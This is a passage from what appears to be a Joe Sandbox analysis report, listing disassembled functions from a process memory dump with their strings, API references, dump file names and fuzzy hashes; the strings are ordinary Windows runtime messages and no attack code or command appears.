                                                                                                                      Function 046CBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • RTL: Resource at %p, xrefs: 04707B8E
                                                                                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04707B7F
                                                                                                                      • RTL: Re-Waiting, xrefs: 04707BAC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3539634136.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.3539634136.0000000004789000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.000000000478D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.00000000047FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_4660000_sdchange.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                      • API String ID: 0-871070163
                                                                                                                      • Opcode ID: eacb1d85b3802e69fe1d98ea9dd5170569c39ebd011faa44bfe71476a1904d5d
                                                                                                                      • Instruction ID: 7e06d5239b18304c81aacf292c1a768456d91f8a17bc93d4c23bebe425f6c073
                                                                                                                      • Opcode Fuzzy Hash: eacb1d85b3802e69fe1d98ea9dd5170569c39ebd011faa44bfe71476a1904d5d
                                                                                                                      • Instruction Fuzzy Hash: 1841E2317017029FD724DE29D841B6AB7E5EF88B14F000A2DF96ADB780EB30F8058B91
                                                                                                                      Function 046CB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0470728C
                                                                                                                      Strings
                                                                                                                      • RTL: Resource at %p, xrefs: 047072A3
                                                                                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04707294
                                                                                                                      • RTL: Re-Waiting, xrefs: 047072C1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3539634136.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.3539634136.0000000004789000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.000000000478D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.00000000047FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_4660000_sdchange.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                      • API String ID: 885266447-605551621
                                                                                                                      • Opcode ID: 5bb26fc34ad5ef9adfe11e36ede5c0be04ff29a47946adaa8e7e857cf3e25b63
                                                                                                                      • Instruction ID: 9841b91c6ea68d6b84110e1a7c88ef9da8323496dc29763ded58ab125dade29d
                                                                                                                      • Opcode Fuzzy Hash: 5bb26fc34ad5ef9adfe11e36ede5c0be04ff29a47946adaa8e7e857cf3e25b63
                                                                                                                      • Instruction Fuzzy Hash: 8A41FF31705216ABD724DF25CD42B6AB7E5FB84B18F10861DF955AB380EB30F8528BD1
                                                                                                                      Function 04742300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3539634136.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.3539634136.0000000004789000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.000000000478D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.00000000047FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_4660000_sdchange.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ___swprintf_l
                                                                                                                      • String ID: %%%u$]:%u
                                                                                                                      • API String ID: 48624451-3050659472
                                                                                                                      • Opcode ID: f3edd0546773bafa391650d35b062aff9a868e01e2b3daca673461e692f9616a
                                                                                                                      • Instruction ID: 5eff9ef32dd609c7a8440585b84c89230661f3c90e9c2c39cb34783a4ed972b7
                                                                                                                      • Opcode Fuzzy Hash: f3edd0546773bafa391650d35b062aff9a868e01e2b3daca673461e692f9616a
                                                                                                                      • Instruction Fuzzy Hash: 16317372A00219AFDB20DF29CC44BFEB7B8EB44750F544599E849E3201EB30BA548BA1
                                                                                                                      Function 046D7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3539634136.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.3539634136.0000000004789000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.000000000478D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.00000000047FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_4660000_sdchange.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __aulldvrm
                                                                                                                      • String ID: +$-
                                                                                                                      • API String ID: 1302938615-2137968064
                                                                                                                      • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                      • Instruction ID: 645bd971d5d5f1e468396ef5aac0f266c14654bab41a487a8df107ff4b9e27f2
                                                                                                                      • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                      • Instruction Fuzzy Hash: 2591A370E0021A9BDF38DE69C881ABEB7A5EF54326F54451AE865E73C0F730B941C762
                                                                                                                      Function 04699126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3539634136.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.3539634136.0000000004789000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.000000000478D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.00000000047FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_4660000_sdchange.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $$@
                                                                                                                      • API String ID: 0-1194432280
                                                                                                                      • Opcode ID: 2d9dd9fcb47831ff99030d765dddbdc97e230d4c212a75bbda58d3a6ee1048cc
                                                                                                                      • Instruction ID: 072776ded1d16360e10f3b07f96454a5e38d3d8d1e1bf9a82d717842c0732fec
                                                                                                                      • Opcode Fuzzy Hash: 2d9dd9fcb47831ff99030d765dddbdc97e230d4c212a75bbda58d3a6ee1048cc
                                                                                                                      • Instruction Fuzzy Hash: 0C810CB1D002699BDB35CB54CC54BEAB7B8AB08714F0041EAEA19B7340E7716E85CFA4